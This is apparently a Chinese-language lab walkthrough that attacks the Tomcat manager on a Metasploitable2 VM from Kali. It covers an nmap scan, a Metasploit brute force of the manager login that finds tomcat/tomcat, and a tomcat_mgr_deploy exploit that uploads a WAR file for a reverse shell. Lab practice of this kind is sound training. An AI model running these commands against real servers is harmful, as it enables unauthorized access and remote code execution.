Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。默认情况下,8180端口是tomcat管理的HTTP端口
实验环境:
攻击机:kali linux
ip:192.168.172.134
目标机:Metasploittable2
ip:192.168.172.129
攻击过程1:
step1:探测
nmap 192.168.172.129
nmap -sV -o 192.168.172.129
step2:爆破
启动msf
命令:use auxiliary/scanner/http/tomcat_mgr_login
show options
set rhosts 192.168.172.129
set rport 8180
run
爆破成功,用户密码为:tomcat /tomcat
攻击过程2:
step1:探测略
step2:漏洞利用
启动msf
命令:use exploit/multi/http/tomcat_mgr_deploy
show options
set httpusername tomcat //指定用户名
set httppassword tomcat //指定用户密码
set rhosts 192.168.172.129
set rport 8180
exploit
漏洞利用成功。
漏洞利用的原理就是上传一个war文件,然后反弹shell。